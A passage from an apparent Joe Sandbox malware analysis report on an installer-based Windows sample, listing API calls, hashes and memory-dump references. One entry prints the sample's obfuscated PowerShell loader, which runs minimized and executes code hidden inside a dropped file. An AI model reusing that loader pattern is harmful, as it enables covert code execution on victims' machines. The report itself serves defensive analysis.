                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1404258612-0
                                                                                                                                            • Opcode ID: d5295571afff2b7ba06b8940d0c237b1bfad39176bc142ff4da2a602cba8f496
                                                                                                                                            • Instruction ID: 9b91fbd94c6ee64b88793a3c9b4d2d612c2f555b57ffdd8fee231bc1bbe1e40f
                                                                                                                                            • Opcode Fuzzy Hash: d5295571afff2b7ba06b8940d0c237b1bfad39176bc142ff4da2a602cba8f496
                                                                                                                                            • Instruction Fuzzy Hash: 37115E71A00108BEDB01EFA5D981DAEBBB9EF04344B20807AF505F21A2D7389E54DB28
                                                                                                                                            Function 0040536C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004214E0,Error launching installer), ref: 00405395
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004053A2
                                                                                                                                            Strings
                                                                                                                                            • Error launching installer, xrefs: 0040537F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                            • String ID: Error launching installer
                                                                                                                                            • API String ID: 3712363035-66219284
                                                                                                                                            • Opcode ID: 78f56604072923640aaa3b77c56e1735b9967a1a3caa926f278c393605d87831
                                                                                                                                            • Instruction ID: 6a75270a898cf8bf2a78dd2ca891eea3d0b09d4229ae2a6fcbb9112043bcd623
                                                                                                                                            • Opcode Fuzzy Hash: 78f56604072923640aaa3b77c56e1735b9967a1a3caa926f278c393605d87831
                                                                                                                                            • Instruction Fuzzy Hash: 5EE0BFB4A04209BFFB10EBA4ED45F7B7AADEB10788F408521BD14F2160D778A8108A79
                                                                                                                                            Function 00403082 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00405E28: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\HVSU7GbA5N.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E80
                                                                                                                                              • Part of subcall function 00405E28: CharNextA.USER32(?,?,?,00000000), ref: 00405E8D
                                                                                                                                              • Part of subcall function 00405E28: CharNextA.USER32(?,"C:\Users\user\Desktop\HVSU7GbA5N.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E92
                                                                                                                                              • Part of subcall function 00405E28: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405EA2
                                                                                                                                            • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 004030A3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                                            • API String ID: 4115351271-3144792594
                                                                                                                                            • Opcode ID: 389a80ee12a651c87ccad1e400f0b61aee7e0e7ab3a8d76480836320ff4f5ec7
                                                                                                                                            • Instruction ID: fee6ec1a5ad4de73206782a352265a6ade63d615f6b53232b42a3ca9793d762f
                                                                                                                                            • Opcode Fuzzy Hash: 389a80ee12a651c87ccad1e400f0b61aee7e0e7ab3a8d76480836320ff4f5ec7
                                                                                                                                            • Instruction Fuzzy Hash: 2CD09222A4BE3062D55137663C0AFCF054C8F5631AB518077F908740C69A6D9A9249EE
                                                                                                                                            Function 004065CC Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2395b39049a362c34a27dfb880213796ab4f3997f605305afcf4b88fff478a5b
                                                                                                                                            • Instruction ID: 17d8f0c9adc7b2b71efc7957c866aa3859f64222e8b37881b9213324db3bf9cd
                                                                                                                                            • Opcode Fuzzy Hash: 2395b39049a362c34a27dfb880213796ab4f3997f605305afcf4b88fff478a5b
                                                                                                                                            • Instruction Fuzzy Hash: E0A15171E00228CBDF28CFA8C8447ADBBB1FB44305F15806ED856BB281D7789A96DF44
                                                                                                                                            Function 004067CD Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e99653bfb7f144ce5dad25bea39bf75b689d07406e35084d2878a8dabe37ac6e
                                                                                                                                            • Instruction ID: fc305786e35d93851c8f3c5d9b38f8a429e7909e60618e2c0103eac0a9dc1c25
                                                                                                                                            • Opcode Fuzzy Hash: e99653bfb7f144ce5dad25bea39bf75b689d07406e35084d2878a8dabe37ac6e
                                                                                                                                            • Instruction Fuzzy Hash: C1913071E00228CBDF28CF98C8547ADBBB1FB44305F15816AD856BB281D7789A96DF44
                                                                                                                                            Function 004064E3 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fe53a61097b749f1782159a8fc3ae1334c5d5d5e9ac5eec79330ddb7b6ec713b
                                                                                                                                            • Instruction ID: 045822fc5ab24079ba69da477224c4b1a41a130b0053ffb1807465ee2ef03bcb
                                                                                                                                            • Opcode Fuzzy Hash: fe53a61097b749f1782159a8fc3ae1334c5d5d5e9ac5eec79330ddb7b6ec713b
                                                                                                                                            • Instruction Fuzzy Hash: AB814771E00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB281D7789A96DF44
                                                                                                                                            Function 00405FE8 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f03dec724b3596635aeae071b0dd6c0542c79984eb544c4ce6f813bf1c132c47
                                                                                                                                            • Instruction ID: efdf2bc729d78145ecf5a565514c9258b5bbce2e4cf5113e346d1a35f2b936d2
                                                                                                                                            • Opcode Fuzzy Hash: f03dec724b3596635aeae071b0dd6c0542c79984eb544c4ce6f813bf1c132c47
                                                                                                                                            • Instruction Fuzzy Hash: AB817771E00228CBDF24DFA8C8447AEBBB0FB45305F15816AD856BB281D7785A96DF44
                                                                                                                                            Function 00406436 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b228df2ed3587aaf6c6f9f97010ba9ba02a5f9c90de50599b2abf323e58cb698
                                                                                                                                            • Instruction ID: c983b8745f75bf2274a463a9cfcccf5039b1f1987fed19ece7001b5e7d797120
                                                                                                                                            • Opcode Fuzzy Hash: b228df2ed3587aaf6c6f9f97010ba9ba02a5f9c90de50599b2abf323e58cb698
                                                                                                                                            • Instruction Fuzzy Hash: 3F712371E00228CFDF28CF98C8447ADBBB1FB44305F15806AD856BB281D7789A96DF54
                                                                                                                                            Function 00406554 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f482201699af14bb3cd10cc7f775e8512ddaef9db8a966204fce1aae5b262981
                                                                                                                                            • Instruction ID: 3e902398f65232741f3d3f2c7f6467c21586f7f50b1ebc0ee674bbd924b4c7fc
                                                                                                                                            • Opcode Fuzzy Hash: f482201699af14bb3cd10cc7f775e8512ddaef9db8a966204fce1aae5b262981
                                                                                                                                            • Instruction Fuzzy Hash: FA714671E00228CFDF28CF98C8447ADBBB1FB44305F15806AD856BB281D7789A96DF44
                                                                                                                                            Function 004064A0 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9a381668fc57e9f6ced01437e848a6b2accfb19374870d44d6b2c2291bed7b2e
                                                                                                                                            • Instruction ID: 9020e7499a55ede5867a2e11e25a0f248b5ba7faeda0d39cd9abe089b181c94d
                                                                                                                                            • Opcode Fuzzy Hash: 9a381668fc57e9f6ced01437e848a6b2accfb19374870d44d6b2c2291bed7b2e
                                                                                                                                            • Instruction Fuzzy Hash: C5715671E00229CFEF28CF98C8447ADBBB1FB44305F15806AD856BB281D7789A96DF44
                                                                                                                                            Function 00401B11 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401B80
                                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B92
                                                                                                                                            Strings
                                                                                                                                            • "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" , xrefs: 00401B38, 00401B3E, 00401B58
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Global$AllocFree
                                                                                                                                            • String ID: "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)"
                                                                                                                                            • API String ID: 3394109436-4270804791
                                                                                                                                            • Opcode ID: f983ec3719a1a8e88d4ca7a85c56023cf217921ff501aa1341a47d20b584023b
                                                                                                                                            • Instruction ID: c19e8536c9ce0dfe35df53e9a23eb4e19a87b6fb9319daf77eae0ba7aa7f10da
                                                                                                                                            • Opcode Fuzzy Hash: f983ec3719a1a8e88d4ca7a85c56023cf217921ff501aa1341a47d20b584023b
                                                                                                                                            • Instruction Fuzzy Hash: E82181B2A04210ABD710ABA48A85A5E72B9DB44314724857BF502F32D1E7BCB9118B5E
                                                                                                                                            Function 0040218A Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00405EC1: FindFirstFileA.KERNELBASE(?,00421528,004210E0,0040577E,004210E0,004210E0,00000000,004210E0,004210E0,?,?,75573410,0040549D,?,C:\Users\user\AppData\Local\Temp\,75573410), ref: 00405ECC
                                                                                                                                              • Part of subcall function 00405EC1: FindClose.KERNELBASE(00000000), ref: 00405ED8
                                                                                                                                            • lstrlenA.KERNEL32 ref: 004021CA
                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 004021D4
                                                                                                                                            • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004021FC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1486964399-0
                                                                                                                                            • Opcode ID: d0cebf27123968e459ae3688530c4f16074f2601d8e216c36dd5cae8460ef4d3
                                                                                                                                            • Instruction ID: 429bd435e4f29a5e27201e76843987645eaf4782e74f669dd4e41dbb99aff123
                                                                                                                                            • Opcode Fuzzy Hash: d0cebf27123968e459ae3688530c4f16074f2601d8e216c36dd5cae8460ef4d3
                                                                                                                                            • Instruction Fuzzy Hash: 601133B1D04309AADB00EFB5CA4999EB7F9AF01304F14853BA505FB2C2D6BCD901DB69
                                                                                                                                            Function 00401E32 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00404EA6: lstrlenA.KERNEL32(Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
                                                                                                                                              • Part of subcall function 00404EA6: lstrlenA.KERNEL32(00402F92,Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
                                                                                                                                              • Part of subcall function 00404EA6: lstrcatA.KERNEL32(Completed,00402F92,00402F92,Completed,00000000,0040E888,00000000), ref: 00404F02
                                                                                                                                              • Part of subcall function 00404EA6: SetWindowTextA.USER32(Completed,Completed), ref: 00404F14
                                                                                                                                              • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
                                                                                                                                              • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
                                                                                                                                              • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62
                                                                                                                                              • Part of subcall function 0040536C: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004214E0,Error launching installer), ref: 00405395
                                                                                                                                              • Part of subcall function 0040536C: CloseHandle.KERNEL32(?), ref: 004053A2
                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
